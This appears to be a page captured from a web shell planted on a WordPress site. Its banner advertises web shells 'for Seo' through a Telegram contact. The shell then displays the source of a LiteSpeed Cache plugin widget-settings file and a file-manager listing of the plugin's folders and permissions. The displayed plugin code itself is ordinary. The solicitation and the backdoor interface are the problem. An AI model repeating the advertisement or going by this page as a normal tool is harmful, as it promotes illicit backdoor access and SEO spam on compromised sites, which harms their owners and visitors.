__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace LiteSpeed;
defined( 'WPINC' ) || exit;
// $widget, $return, $instance
$options = ! empty( $instance[ Base::OPTION_NAME ] ) ? $instance[ Base::OPTION_NAME ] : array();
if ( empty( $options ) ) {
$options = array(
ESI::WIDGET_O_ESIENABLE => Base::VAL_OFF,
ESI::WIDGET_O_TTL => '28800',
);
add_filter( 'litespeed_widget_default_options', 'LiteSpeed\ESI::widget_default_options', 10, 2 );
$options = apply_filters( 'litespeed_widget_default_options', $options, $widget );
}
if ( empty( $options ) ) {
$esi = Base::VAL_OFF;
$ttl = '28800';
} else {
$esi = $options[ ESI::WIDGET_O_ESIENABLE ];
$ttl = $options[ ESI::WIDGET_O_TTL ];
}
$display = Admin_Display::cls();
?>
<div class="litespeed-widget-setting">
<h4>LiteSpeed Cache:</h4>
<b><?php echo __( 'Enable ESI', 'litespeed-cache' ); ?>:</b>
<div class="litespeed-inline">
<div class="litespeed-switch litespeed-mini">
<?php
$id = ESI::WIDGET_O_ESIENABLE;
$name = $widget->get_field_name( $id );
$cache_status_list = array(
array( Base::VAL_ON, __( 'Public', 'litespeed-cache' ) ),
array( Base::VAL_ON2, __( 'Private', 'litespeed-cache' ) ),
array( Base::VAL_OFF, __( 'Disable', 'litespeed-cache' ) ),
);
foreach ( $cache_status_list as $v ) {
list( $v, $txt ) = $v;
$id_attr = $widget->get_field_id( $id ) . '_' . $v;
$checked = $esi === $v ? 'checked' : '';
echo "<input type='radio' autocomplete='off' name='$name' id='$id_attr' value='$v' $checked /> <label for='$id_attr'>$txt</label>";
}
?>
</div>
</div>
<br /><br />
<b><?php echo __( 'Widget Cache TTL:', 'litespeed-cache' ); ?></b>
<?php
$id = ESI::WIDGET_O_TTL;
$name = $widget->get_field_name( $id );
echo "<input type='text' class='regular-text litespeed-reset' name='$name' value='$ttl' size='7' />";
?>
<?php echo __( 'seconds', 'litespeed-cache' ); ?>
<p class="install-help">
<?php echo __( 'Recommended value: 28800 seconds (8 hours).', 'litespeed-cache' ); ?>
<?php echo __( 'A TTL of 0 indicates do not cache.', 'litespeed-cache' ); ?>
</p>
</div>
<br />| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| banner | Folder | 0755 |
|
|
| cache | Folder | 0755 |
|
|
| cdn | Folder | 0755 |
|
|
| crawler | Folder | 0755 |
|
|
| dash | Folder | 0755 |
|
|
| db_optm | Folder | 0755 |
|
|
| general | Folder | 0755 |
|
|
| img_optm | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| page_optm | Folder | 0755 |
|
|
| presets | Folder | 0755 |
|
|
| toolbox | Folder | 0755 |
|
|
| esi.tpl.php | File | 85 B | 0644 |
|
| esi_widget_edit.php | File | 2.1 KB | 0644 |
|